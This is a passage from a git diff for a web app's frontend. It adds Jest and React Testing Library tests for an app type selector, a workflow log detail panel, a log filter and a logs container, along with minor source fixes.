'app.typeSelector.chatbot'], + [AppModeEnum.AGENT_CHAT, 'app.typeSelector.agent'], + [AppModeEnum.COMPLETION, 'app.typeSelector.completion'], + [AppModeEnum.ADVANCED_CHAT, 'app.typeSelector.advanced'], + [AppModeEnum.WORKFLOW, 'app.typeSelector.workflow'], + ] as const)('should render label %s for type %s', (_type, expectedLabel) => { + render() + expect(screen.getByText(expectedLabel)).toBeInTheDocument() + }) + + // Covers fallback behavior for unexpected app mode values. + it('should render empty label for unknown type', () => { + const { container } = render() + expect(container.textContent).toBe('') + }) +}) + +describe('AppTypeIcon', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + // Covers icon rendering for each supported app type. + it.each([ + [AppModeEnum.CHAT], + [AppModeEnum.AGENT_CHAT], + [AppModeEnum.COMPLETION], + [AppModeEnum.ADVANCED_CHAT], + [AppModeEnum.WORKFLOW], + ] as const)('should render icon for type %s', (type) => { + const { container } = render() + expect(container.querySelector('svg')).toBeInTheDocument() + }) + + // Covers fallback behavior for unexpected app mode values. + it('should render nothing for unknown type', () => { + const { container } = render() + expect(container.firstChild).toBeNull() + }) +}) diff --git a/web/app/components/app/type-selector/index.tsx b/web/app/components/app/type-selector/index.tsx index 0f6f050953..f213a89a94 100644 --- a/web/app/components/app/type-selector/index.tsx +++ b/web/app/components/app/type-selector/index.tsx @@ -2,7 +2,7 @@ import { useTranslation } from 'react-i18next' import React, { useState } from 'react' import { RiArrowDownSLine, RiCloseCircleFill, RiExchange2Fill, RiFilter3Line } from '@remixicon/react' import Checkbox from '../../base/checkbox' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { PortalToFollowElem, PortalToFollowElemContent, @@ -20,6 +20,7 @@ const allTypes: AppModeEnum[] = [AppModeEnum.WORKFLOW, AppModeEnum.ADVANCED_CHAT const AppTypeSelector = ({ value, onChange }: AppSelectorProps) => { const [open, setOpen] = useState(false) + const { t } = useTranslation() return ( { 'flex cursor-pointer items-center justify-between space-x-1 rounded-md px-2 hover:bg-state-base-hover', )}> - {value && value.length > 0 &&
    { - e.stopPropagation() - onChange([]) - }}> - -
    } + {value && value.length > 0 && ( + + )}
    diff --git a/web/app/components/app/workflow-log/detail.spec.tsx b/web/app/components/app/workflow-log/detail.spec.tsx new file mode 100644 index 0000000000..b594be5f04 --- /dev/null +++ b/web/app/components/app/workflow-log/detail.spec.tsx @@ -0,0 +1,319 @@ +/** + * DetailPanel Component Tests + * + * Tests the workflow run detail panel which displays: + * - Workflow run title + * - Replay button (when canReplay is true) + * - Close button + * - Run component with detail/tracing URLs + */ + +import { render, screen } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import DetailPanel from './detail' +import { useStore as useAppStore } from '@/app/components/app/store' +import type { App, AppIconType, AppModeEnum } from '@/types/app' + +// ============================================================================ +// Mocks +// ============================================================================ + +const mockRouterPush = jest.fn() +jest.mock('next/navigation', () => ({ + useRouter: () => ({ + push: mockRouterPush, + }), +})) + +// Mock the Run component as it has complex dependencies +jest.mock('@/app/components/workflow/run', () => ({ + __esModule: true, + default: ({ runDetailUrl, tracingListUrl }: { runDetailUrl: string; tracingListUrl: string }) => ( +
    + {runDetailUrl} + {tracingListUrl} +
    + ), +})) + +// Mock WorkflowContextProvider +jest.mock('@/app/components/workflow/context', () => ({ + WorkflowContextProvider: ({ children }: { children: React.ReactNode }) => ( +
    {children}
    + ), +})) + +// Mock ahooks for useBoolean (used by TooltipPlus) +jest.mock('ahooks', () => ({ + useBoolean: (initial: boolean) => { + const setters = { + setTrue: jest.fn(), + setFalse: jest.fn(), + toggle: jest.fn(), + } + return [initial, setters] as const + }, +})) + +// ============================================================================ +// Test Data Factories +// ============================================================================ + +const createMockApp = (overrides: Partial = {}): App => ({ + id: 'test-app-id', + name: 'Test App', + description: 'Test app description', + author_name: 'Test Author', + icon_type: 'emoji' as AppIconType, + icon: '🚀', + icon_background: '#FFEAD5', + icon_url: null, + use_icon_as_answer_icon: false, + mode: 'workflow' as AppModeEnum, + enable_site: true, + enable_api: true, + api_rpm: 60, + api_rph: 3600, + is_demo: false, + model_config: {} as App['model_config'], + app_model_config: {} as App['app_model_config'], + created_at: Date.now(), + updated_at: Date.now(), + site: { + access_token: 'token', + app_base_url: 'https://example.com', + } as App['site'], + api_base_url: 'https://api.example.com', + tags: [], + access_mode: 'public_access' as App['access_mode'], + ...overrides, +}) + +// ============================================================================ +// Tests +// ============================================================================ + +describe('DetailPanel', () => { + const defaultOnClose = jest.fn() + + beforeEach(() => { + jest.clearAllMocks() + useAppStore.setState({ appDetail: createMockApp() }) + }) + + // -------------------------------------------------------------------------- + // Rendering Tests (REQUIRED) + // -------------------------------------------------------------------------- + describe('Rendering', () => { + it('should render without crashing', () => { + render() + + expect(screen.getByText('appLog.runDetail.workflowTitle')).toBeInTheDocument() + }) + + it('should render workflow title', () => { + render() + + expect(screen.getByText('appLog.runDetail.workflowTitle')).toBeInTheDocument() + }) + + it('should render close button', () => { + const { container } = render() + + // Close button has RiCloseLine icon + const closeButton = container.querySelector('span.cursor-pointer') + expect(closeButton).toBeInTheDocument() + }) + + it('should render Run component with correct URLs', () => { + useAppStore.setState({ appDetail: createMockApp({ id: 'app-456' }) }) + + render() + + expect(screen.getByTestId('workflow-run')).toBeInTheDocument() + expect(screen.getByTestId('run-detail-url')).toHaveTextContent('/apps/app-456/workflow-runs/run-789') + expect(screen.getByTestId('tracing-list-url')).toHaveTextContent('/apps/app-456/workflow-runs/run-789/node-executions') + }) + + it('should render WorkflowContextProvider wrapper', () => { + render() + + expect(screen.getByTestId('workflow-context-provider')).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Props Tests (REQUIRED) + // -------------------------------------------------------------------------- + describe('Props', () => { + it('should not render replay button when canReplay is false (default)', () => { + render() + + expect(screen.queryByRole('button', { name: 'appLog.runDetail.testWithParams' })).not.toBeInTheDocument() + }) + + it('should render replay button when canReplay is true', () => { + render() + + expect(screen.getByRole('button', { name: 'appLog.runDetail.testWithParams' })).toBeInTheDocument() + }) + + it('should use empty URL when runID is empty', () => { + render() + + expect(screen.getByTestId('run-detail-url')).toHaveTextContent('') + expect(screen.getByTestId('tracing-list-url')).toHaveTextContent('') + }) + }) + + // -------------------------------------------------------------------------- + // User Interactions + // -------------------------------------------------------------------------- + describe('User Interactions', () => { + it('should call onClose when close button is clicked', async () => { + const user = userEvent.setup() + const onClose = jest.fn() + + const { container } = render() + + const closeButton = container.querySelector('span.cursor-pointer') + expect(closeButton).toBeInTheDocument() + + await user.click(closeButton!) + + expect(onClose).toHaveBeenCalledTimes(1) + }) + + it('should navigate to workflow page with replayRunId when replay button is clicked', async () => { + const user = userEvent.setup() + useAppStore.setState({ appDetail: createMockApp({ id: 'app-replay-test' }) }) + + render() + + const replayButton = screen.getByRole('button', { name: 'appLog.runDetail.testWithParams' }) + await user.click(replayButton) + + expect(mockRouterPush).toHaveBeenCalledWith('/app/app-replay-test/workflow?replayRunId=run-to-replay') + }) + + it('should not navigate when replay clicked but appDetail is missing', async () => { + const user = userEvent.setup() + useAppStore.setState({ appDetail: undefined }) + + render() + + const replayButton = screen.getByRole('button', { name: 'appLog.runDetail.testWithParams' }) + await user.click(replayButton) + + expect(mockRouterPush).not.toHaveBeenCalled() + }) + }) + + // -------------------------------------------------------------------------- + // URL Generation Tests + // -------------------------------------------------------------------------- + describe('URL Generation', () => { + it('should generate correct run detail URL', () => { + useAppStore.setState({ appDetail: createMockApp({ id: 'my-app' }) }) + + render() + + expect(screen.getByTestId('run-detail-url')).toHaveTextContent('/apps/my-app/workflow-runs/my-run') + }) + + it('should generate correct tracing list URL', () => { + useAppStore.setState({ appDetail: createMockApp({ id: 'my-app' }) }) + + render() + + expect(screen.getByTestId('tracing-list-url')).toHaveTextContent('/apps/my-app/workflow-runs/my-run/node-executions') + }) + + it('should handle special characters in runID', () => { + useAppStore.setState({ appDetail: createMockApp({ id: 'app-id' }) }) + + render() + + expect(screen.getByTestId('run-detail-url')).toHaveTextContent('/apps/app-id/workflow-runs/run-with-special-123') + }) + }) + + // -------------------------------------------------------------------------- + // Store Integration Tests + // -------------------------------------------------------------------------- + describe('Store Integration', () => { + it('should read appDetail from store', () => { + useAppStore.setState({ appDetail: createMockApp({ id: 'store-app-id' }) }) + + render() + + expect(screen.getByTestId('run-detail-url')).toHaveTextContent('/apps/store-app-id/workflow-runs/run-123') + }) + + it('should handle undefined appDetail from store gracefully', () => { + useAppStore.setState({ appDetail: undefined }) + + render() + + // Run component should still render but with undefined in URL + expect(screen.getByTestId('workflow-run')).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Edge Cases (REQUIRED) + // -------------------------------------------------------------------------- + describe('Edge Cases', () => { + it('should handle empty runID', () => { + render() + + expect(screen.getByTestId('run-detail-url')).toHaveTextContent('') + expect(screen.getByTestId('tracing-list-url')).toHaveTextContent('') + }) + + it('should handle very long runID', () => { + const longRunId = 'a'.repeat(100) + useAppStore.setState({ appDetail: createMockApp({ id: 'app-id' }) }) + + render() + + expect(screen.getByTestId('run-detail-url')).toHaveTextContent(`/apps/app-id/workflow-runs/${longRunId}`) + }) + + it('should render replay button with correct aria-label', () => { + render() + + const replayButton = screen.getByRole('button', { name: 'appLog.runDetail.testWithParams' }) + expect(replayButton).toHaveAttribute('aria-label', 'appLog.runDetail.testWithParams') + }) + + it('should maintain proper component structure', () => { + const { container } = render() + + // Check for main container with flex layout + const mainContainer = container.querySelector('.flex.grow.flex-col') + expect(mainContainer).toBeInTheDocument() + + // Check for header section + const header = container.querySelector('.flex.items-center.bg-components-panel-bg') + expect(header).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Tooltip Tests + // -------------------------------------------------------------------------- + describe('Tooltip', () => { + it('should have tooltip on replay button', () => { + render() + + // The replay button should be wrapped in TooltipPlus + const replayButton = screen.getByRole('button', { name: 'appLog.runDetail.testWithParams' }) + expect(replayButton).toBeInTheDocument() + + // TooltipPlus wraps the button with popupContent + // We verify the button exists with the correct aria-label + expect(replayButton).toHaveAttribute('type', 'button') + }) + }) +}) diff --git a/web/app/components/app/workflow-log/filter.spec.tsx b/web/app/components/app/workflow-log/filter.spec.tsx new file mode 100644 index 0000000000..04216e5cc8 --- /dev/null +++ b/web/app/components/app/workflow-log/filter.spec.tsx @@ -0,0 +1,537 @@ +/** + * Filter Component Tests + * + * Tests the workflow log filter component which provides: + * - Status filtering (all, succeeded, failed, stopped, partial-succeeded) + * - Time period selection + * - Keyword search + */ + +import { useState } from 'react' +import { fireEvent, render, screen, waitFor } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import Filter, { TIME_PERIOD_MAPPING } from './filter' +import type { QueryParam } from './index' + +// ============================================================================ +// Mocks +// ============================================================================ + +const mockTrackEvent = jest.fn() +jest.mock('@/app/components/base/amplitude/utils', () => ({ + trackEvent: (...args: unknown[]) => mockTrackEvent(...args), +})) + +// ============================================================================ +// Test Data Factories +// ============================================================================ + +const createDefaultQueryParams = (overrides: Partial = {}): QueryParam => ({ + status: 'all', + period: '2', // default to last 7 days + ...overrides, +}) + +// ============================================================================ +// Tests +// ============================================================================ + +describe('Filter', () => { + const defaultSetQueryParams = jest.fn() + + beforeEach(() => { + jest.clearAllMocks() + }) + + // -------------------------------------------------------------------------- + // Rendering Tests (REQUIRED) + // -------------------------------------------------------------------------- + describe('Rendering', () => { + it('should render without crashing', () => { + render( + , + ) + + // Should render status chip, period chip, and search input + expect(screen.getByText('All')).toBeInTheDocument() + expect(screen.getByPlaceholderText('common.operation.search')).toBeInTheDocument() + }) + + it('should render all filter components', () => { + render( + , + ) + + // Status chip + expect(screen.getByText('All')).toBeInTheDocument() + // Period chip (shows translated key) + expect(screen.getByText('appLog.filter.period.last7days')).toBeInTheDocument() + // Search input + expect(screen.getByPlaceholderText('common.operation.search')).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Status Filter Tests + // -------------------------------------------------------------------------- + describe('Status Filter', () => { + it('should display current status value', () => { + render( + , + ) + + // Chip should show Success for succeeded status + expect(screen.getByText('Success')).toBeInTheDocument() + }) + + it('should open status dropdown when clicked', async () => { + const user = userEvent.setup() + + render( + , + ) + + await user.click(screen.getByText('All')) + + // Should show all status options + await waitFor(() => { + expect(screen.getByText('Success')).toBeInTheDocument() + expect(screen.getByText('Fail')).toBeInTheDocument() + expect(screen.getByText('Stop')).toBeInTheDocument() + expect(screen.getByText('Partial Success')).toBeInTheDocument() + }) + }) + + it('should call setQueryParams when status is selected', async () => { + const user = userEvent.setup() + const setQueryParams = jest.fn() + + render( + , + ) + + await user.click(screen.getByText('All')) + await user.click(await screen.findByText('Success')) + + expect(setQueryParams).toHaveBeenCalledWith({ + status: 'succeeded', + period: '2', + }) + }) + + it('should track status selection event', async () => { + const user = userEvent.setup() + + render( + , + ) + + await user.click(screen.getByText('All')) + await user.click(await screen.findByText('Fail')) + + expect(mockTrackEvent).toHaveBeenCalledWith( + 'workflow_log_filter_status_selected', + { workflow_log_filter_status: 'failed' }, + ) + }) + + it('should reset to all when status is cleared', async () => { + const user = userEvent.setup() + const setQueryParams = jest.fn() + + const { container } = render( + , + ) + + // Find the clear icon (div with group/clear class) in the status chip + const clearIcon = container.querySelector('.group\\/clear') + + expect(clearIcon).toBeInTheDocument() + await user.click(clearIcon!) + + expect(setQueryParams).toHaveBeenCalledWith({ + status: 'all', + period: '2', + }) + }) + + test.each([ + ['all', 'All'], + ['succeeded', 'Success'], + ['failed', 'Fail'], + ['stopped', 'Stop'], + ['partial-succeeded', 'Partial Success'], + ])('should display correct label for %s status', (statusValue, expectedLabel) => { + render( + , + ) + + expect(screen.getByText(expectedLabel)).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Time Period Filter Tests + // -------------------------------------------------------------------------- + describe('Time Period Filter', () => { + it('should display current period value', () => { + render( + , + ) + + expect(screen.getByText('appLog.filter.period.today')).toBeInTheDocument() + }) + + it('should open period dropdown when clicked', async () => { + const user = userEvent.setup() + + render( + , + ) + + await user.click(screen.getByText('appLog.filter.period.last7days')) + + // Should show all period options + await waitFor(() => { + expect(screen.getByText('appLog.filter.period.today')).toBeInTheDocument() + expect(screen.getByText('appLog.filter.period.last4weeks')).toBeInTheDocument() + expect(screen.getByText('appLog.filter.period.last3months')).toBeInTheDocument() + expect(screen.getByText('appLog.filter.period.allTime')).toBeInTheDocument() + }) + }) + + it('should call setQueryParams when period is selected', async () => { + const user = userEvent.setup() + const setQueryParams = jest.fn() + + render( + , + ) + + await user.click(screen.getByText('appLog.filter.period.last7days')) + await user.click(await screen.findByText('appLog.filter.period.allTime')) + + expect(setQueryParams).toHaveBeenCalledWith({ + status: 'all', + period: '9', + }) + }) + + it('should reset period to allTime when cleared', async () => { + const user = userEvent.setup() + const setQueryParams = jest.fn() + + render( + , + ) + + // Find the period chip's clear button + const periodChip = screen.getByText('appLog.filter.period.last7days').closest('div') + const clearButton = periodChip?.querySelector('button[type="button"]') + + if (clearButton) { + await user.click(clearButton) + expect(setQueryParams).toHaveBeenCalledWith({ + status: 'all', + period: '9', + }) + } + }) + }) + + // -------------------------------------------------------------------------- + // Keyword Search Tests + // -------------------------------------------------------------------------- + describe('Keyword Search', () => { + it('should display current keyword value', () => { + render( + , + ) + + expect(screen.getByDisplayValue('test search')).toBeInTheDocument() + }) + + it('should call setQueryParams when typing in search', async () => { + const user = userEvent.setup() + const setQueryParams = jest.fn() + + const Wrapper = () => { + const [queryParams, updateQueryParams] = useState(createDefaultQueryParams()) + const handleSetQueryParams = (next: QueryParam) => { + updateQueryParams(next) + setQueryParams(next) + } + return ( + + ) + } + + render() + + const input = screen.getByPlaceholderText('common.operation.search') + await user.type(input, 'workflow') + + // Should call setQueryParams for each character typed + expect(setQueryParams).toHaveBeenLastCalledWith( + expect.objectContaining({ keyword: 'workflow' }), + ) + }) + + it('should clear keyword when clear button is clicked', async () => { + const user = userEvent.setup() + const setQueryParams = jest.fn() + + const { container } = render( + , + ) + + // The Input component renders a clear icon div inside the input wrapper + // when showClearIcon is true and value exists + const inputWrapper = container.querySelector('.w-\\[200px\\]') + + // Find the clear icon div (has cursor-pointer class and contains RiCloseCircleFill) + const clearIconDiv = inputWrapper?.querySelector('div.cursor-pointer') + + expect(clearIconDiv).toBeInTheDocument() + await user.click(clearIconDiv!) + + expect(setQueryParams).toHaveBeenCalledWith({ + status: 'all', + period: '2', + keyword: '', + }) + }) + + it('should update on direct input change', () => { + const setQueryParams = jest.fn() + + render( + , + ) + + const input = screen.getByPlaceholderText('common.operation.search') + fireEvent.change(input, { target: { value: 'new search' } }) + + expect(setQueryParams).toHaveBeenCalledWith({ + status: 'all', + period: '2', + keyword: 'new search', + }) + }) + }) + + // -------------------------------------------------------------------------- + // TIME_PERIOD_MAPPING Tests + // -------------------------------------------------------------------------- + describe('TIME_PERIOD_MAPPING', () => { + it('should have correct mapping for today', () => { + expect(TIME_PERIOD_MAPPING['1']).toEqual({ value: 0, name: 'today' }) + }) + + it('should have correct mapping for last 7 days', () => { + expect(TIME_PERIOD_MAPPING['2']).toEqual({ value: 7, name: 'last7days' }) + }) + + it('should have correct mapping for last 4 weeks', () => { + expect(TIME_PERIOD_MAPPING['3']).toEqual({ value: 28, name: 'last4weeks' }) + }) + + it('should have correct mapping for all time', () => { + expect(TIME_PERIOD_MAPPING['9']).toEqual({ value: -1, name: 'allTime' }) + }) + + it('should have all 9 predefined time periods', () => { + expect(Object.keys(TIME_PERIOD_MAPPING)).toHaveLength(9) + }) + + test.each([ + ['1', 'today', 0], + ['2', 'last7days', 7], + ['3', 'last4weeks', 28], + ['9', 'allTime', -1], + ])('TIME_PERIOD_MAPPING[%s] should have name=%s and correct value', (key, name, expectedValue) => { + const mapping = TIME_PERIOD_MAPPING[key] + expect(mapping.name).toBe(name) + if (expectedValue >= 0) + expect(mapping.value).toBe(expectedValue) + else + expect(mapping.value).toBe(-1) + }) + }) + + // -------------------------------------------------------------------------- + // Edge Cases (REQUIRED) + // -------------------------------------------------------------------------- + describe('Edge Cases', () => { + it('should handle undefined keyword gracefully', () => { + render( + , + ) + + const input = screen.getByPlaceholderText('common.operation.search') + expect(input).toHaveValue('') + }) + + it('should handle empty string keyword', () => { + render( + , + ) + + const input = screen.getByPlaceholderText('common.operation.search') + expect(input).toHaveValue('') + }) + + it('should preserve other query params when updating status', async () => { + const user = userEvent.setup() + const setQueryParams = jest.fn() + + render( + , + ) + + await user.click(screen.getByText('All')) + await user.click(await screen.findByText('Success')) + + expect(setQueryParams).toHaveBeenCalledWith({ + status: 'succeeded', + period: '3', + keyword: 'test', + }) + }) + + it('should preserve other query params when updating period', async () => { + const user = userEvent.setup() + const setQueryParams = jest.fn() + + render( + , + ) + + await user.click(screen.getByText('appLog.filter.period.last7days')) + await user.click(await screen.findByText('appLog.filter.period.today')) + + expect(setQueryParams).toHaveBeenCalledWith({ + status: 'failed', + period: '1', + keyword: 'test', + }) + }) + + it('should preserve other query params when updating keyword', async () => { + const user = userEvent.setup() + const setQueryParams = jest.fn() + + render( + , + ) + + const input = screen.getByPlaceholderText('common.operation.search') + await user.type(input, 'a') + + expect(setQueryParams).toHaveBeenCalledWith({ + status: 'failed', + period: '3', + keyword: 'a', + }) + }) + }) + + // -------------------------------------------------------------------------- + // Integration Tests + // -------------------------------------------------------------------------- + describe('Integration', () => { + it('should render with all filters visible simultaneously', () => { + render( + , + ) + + expect(screen.getByText('Success')).toBeInTheDocument() + expect(screen.getByText('appLog.filter.period.today')).toBeInTheDocument() + expect(screen.getByDisplayValue('integration test')).toBeInTheDocument() + }) + + it('should have proper layout with flex and gap', () => { + const { container } = render( + , + ) + + const filterContainer = container.firstChild as HTMLElement + expect(filterContainer).toHaveClass('flex') + expect(filterContainer).toHaveClass('flex-row') + expect(filterContainer).toHaveClass('gap-2') + }) + }) +}) diff --git a/web/app/components/app/workflow-log/filter.tsx b/web/app/components/app/workflow-log/filter.tsx index 0c8d72c1be..a4db4c9642 100644 --- a/web/app/components/app/workflow-log/filter.tsx +++ b/web/app/components/app/workflow-log/filter.tsx @@ -65,7 +65,7 @@ const Filter: FC = ({ queryParams, setQueryParams }: IFilterProps) wrapperClassName='w-[200px]' showLeftIcon showClearIcon - value={queryParams.keyword} + value={queryParams.keyword ?? ''} placeholder={t('common.operation.search')!} onChange={(e) => { setQueryParams({ ...queryParams, keyword: e.target.value }) diff --git a/web/app/components/app/workflow-log/index.spec.tsx b/web/app/components/app/workflow-log/index.spec.tsx new file mode 100644 index 0000000000..e6d9f37949 --- /dev/null +++ b/web/app/components/app/workflow-log/index.spec.tsx @@ -0,0 +1,592 @@ +/** + * Logs Container Component Tests + * + * Tests the main Logs container component which: + * - Fetches workflow logs via useSWR + * - Manages query parameters (status, period, keyword) + * - Handles pagination + * - Renders Filter, List, and Empty states + * + * Note: Individual component tests are in their respective spec files: + * - filter.spec.tsx + * - list.spec.tsx + * - detail.spec.tsx + * - trigger-by-display.spec.tsx + */ + +import { render, screen, waitFor } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import useSWR from 'swr' +import Logs, { type ILogsProps } from './index' +import { TIME_PERIOD_MAPPING } from './filter' +import type { App, AppIconType, AppModeEnum } from '@/types/app' +import type { WorkflowAppLogDetail, WorkflowLogsResponse, WorkflowRunDetail } from '@/models/log' +import { WorkflowRunTriggeredFrom } from '@/models/log' +import { APP_PAGE_LIMIT } from '@/config' + +// ============================================================================ +// Mocks +// ============================================================================ + +jest.mock('swr') + +jest.mock('ahooks', () => ({ + useDebounce: (value: T) => value, + useDebounceFn: (fn: (value: string) => void) => ({ run: fn }), + useBoolean: (initial: boolean) => { + const setters = { + setTrue: jest.fn(), + setFalse: jest.fn(), + toggle: jest.fn(), + } + return [initial, setters] as const + }, +})) + +jest.mock('next/navigation', () => ({ + useRouter: () => ({ + push: jest.fn(), + }), +})) + +jest.mock('next/link', () => ({ + __esModule: true, + default: ({ children, href }: { children: React.ReactNode; href: string }) => {children}, +})) + +// Mock the Run component to avoid complex dependencies +jest.mock('@/app/components/workflow/run', () => ({ + __esModule: true, + default: ({ runDetailUrl, tracingListUrl }: { runDetailUrl: string; tracingListUrl: string }) => ( +
    + {runDetailUrl} + {tracingListUrl} +
    + ), +})) + +const mockTrackEvent = jest.fn() +jest.mock('@/app/components/base/amplitude/utils', () => ({ + trackEvent: (...args: unknown[]) => mockTrackEvent(...args), +})) + +jest.mock('@/service/log', () => ({ + fetchWorkflowLogs: jest.fn(), +})) + +jest.mock('@/hooks/use-theme', () => ({ + __esModule: true, + default: () => { + const { Theme } = require('@/types/app') + return { theme: Theme.light } + }, +})) + +jest.mock('@/context/app-context', () => ({ + useAppContext: () => ({ + userProfile: { timezone: 'UTC' }, + }), +})) + +// Mock useTimestamp +jest.mock('@/hooks/use-timestamp', () => ({ + __esModule: true, + default: () => ({ + formatTime: (timestamp: number, _format: string) => `formatted-${timestamp}`, + }), +})) + +// Mock useBreakpoints +jest.mock('@/hooks/use-breakpoints', () => ({ + __esModule: true, + default: () => 'pc', + MediaType: { + mobile: 'mobile', + pc: 'pc', + }, +})) + +// Mock BlockIcon +jest.mock('@/app/components/workflow/block-icon', () => ({ + __esModule: true, + default: () =>
    BlockIcon
    , +})) + +// Mock WorkflowContextProvider +jest.mock('@/app/components/workflow/context', () => ({ + WorkflowContextProvider: ({ children }: { children: React.ReactNode }) => ( +
    {children}
    + ), +})) + +const mockedUseSWR = useSWR as jest.MockedFunction + +// ============================================================================ +// Test Data Factories +// ============================================================================ + +const createMockApp = (overrides: Partial = {}): App => ({ + id: 'test-app-id', + name: 'Test App', + description: 'Test app description', + author_name: 'Test Author', + icon_type: 'emoji' as AppIconType, + icon: '🚀', + icon_background: '#FFEAD5', + icon_url: null, + use_icon_as_answer_icon: false, + mode: 'workflow' as AppModeEnum, + enable_site: true, + enable_api: true, + api_rpm: 60, + api_rph: 3600, + is_demo: false, + model_config: {} as App['model_config'], + app_model_config: {} as App['app_model_config'], + created_at: Date.now(), + updated_at: Date.now(), + site: { + access_token: 'token', + app_base_url: 'https://example.com', + } as App['site'], + api_base_url: 'https://api.example.com', + tags: [], + access_mode: 'public_access' as App['access_mode'], + ...overrides, +}) + +const createMockWorkflowRun = (overrides: Partial = {}): WorkflowRunDetail => ({ + id: 'run-1', + version: '1.0.0', + status: 'succeeded', + elapsed_time: 1.234, + total_tokens: 100, + total_price: 0.001, + currency: 'USD', + total_steps: 5, + finished_at: Date.now(), + triggered_from: WorkflowRunTriggeredFrom.APP_RUN, + ...overrides, +}) + +const createMockWorkflowLog = (overrides: Partial = {}): WorkflowAppLogDetail => ({ + id: 'log-1', + workflow_run: createMockWorkflowRun(), + created_from: 'web-app', + created_by_role: 'account', + created_by_account: { + id: 'account-1', + name: 'Test User', + email: 'test@example.com', + }, + created_at: Date.now(), + ...overrides, +}) + +const createMockLogsResponse = ( + data: WorkflowAppLogDetail[] = [], + total = data.length, +): WorkflowLogsResponse => ({ + data, + has_more: data.length < total, + limit: APP_PAGE_LIMIT, + total, + page: 1, +}) + +// ============================================================================ +// Tests +// ============================================================================ + +describe('Logs Container', () => { + const defaultProps: ILogsProps = { + appDetail: createMockApp(), + } + + beforeEach(() => { + jest.clearAllMocks() + }) + + // -------------------------------------------------------------------------- + // Rendering Tests (REQUIRED) + // -------------------------------------------------------------------------- + describe('Rendering', () => { + it('should render without crashing', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([], 0), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + expect(screen.getByText('appLog.workflowTitle')).toBeInTheDocument() + }) + + it('should render title and subtitle', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([], 0), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + expect(screen.getByText('appLog.workflowTitle')).toBeInTheDocument() + expect(screen.getByText('appLog.workflowSubtitle')).toBeInTheDocument() + }) + + it('should render Filter component', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([], 0), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + expect(screen.getByPlaceholderText('common.operation.search')).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Loading State Tests + // -------------------------------------------------------------------------- + describe('Loading State', () => { + it('should show loading spinner when data is undefined', () => { + mockedUseSWR.mockReturnValue({ + data: undefined, + mutate: jest.fn(), + isValidating: true, + isLoading: true, + error: undefined, + }) + + const { container } = render() + + expect(container.querySelector('.spin-animation')).toBeInTheDocument() + }) + + it('should not show loading spinner when data is available', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([createMockWorkflowLog()], 1), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + const { container } = render() + + expect(container.querySelector('.spin-animation')).not.toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Empty State Tests + // -------------------------------------------------------------------------- + describe('Empty State', () => { + it('should render empty element when total is 0', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([], 0), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + expect(screen.getByText('appLog.table.empty.element.title')).toBeInTheDocument() + expect(screen.queryByRole('table')).not.toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Data Fetching Tests + // -------------------------------------------------------------------------- + describe('Data Fetching', () => { + it('should call useSWR with correct URL and default params', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([], 0), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + const keyArg = mockedUseSWR.mock.calls.at(-1)?.[0] as { url: string; params: Record } + expect(keyArg).toMatchObject({ + url: `/apps/${defaultProps.appDetail.id}/workflow-app-logs`, + params: expect.objectContaining({ + page: 1, + detail: true, + limit: APP_PAGE_LIMIT, + }), + }) + }) + + it('should include date filters for non-allTime periods', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([], 0), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + const keyArg = mockedUseSWR.mock.calls.at(-1)?.[0] as { params?: Record } + expect(keyArg?.params).toHaveProperty('created_at__after') + expect(keyArg?.params).toHaveProperty('created_at__before') + }) + + it('should not include status param when status is all', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([], 0), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + const keyArg = mockedUseSWR.mock.calls.at(-1)?.[0] as { params?: Record } + expect(keyArg?.params).not.toHaveProperty('status') + }) + }) + + // -------------------------------------------------------------------------- + // Filter Integration Tests + // -------------------------------------------------------------------------- + describe('Filter Integration', () => { + it('should update query when selecting status filter', async () => { + const user = userEvent.setup() + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([], 0), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + // Click status filter + await user.click(screen.getByText('All')) + await user.click(await screen.findByText('Success')) + + // Check that useSWR was called with updated params + await waitFor(() => { + const lastCall = mockedUseSWR.mock.calls.at(-1)?.[0] as { params?: Record } + expect(lastCall?.params).toMatchObject({ + status: 'succeeded', + }) + }) + }) + + it('should update query when selecting period filter', async () => { + const user = userEvent.setup() + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([], 0), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + // Click period filter + await user.click(screen.getByText('appLog.filter.period.last7days')) + await user.click(await screen.findByText('appLog.filter.period.allTime')) + + // When period is allTime (9), date filters should be removed + await waitFor(() => { + const lastCall = mockedUseSWR.mock.calls.at(-1)?.[0] as { params?: Record } + 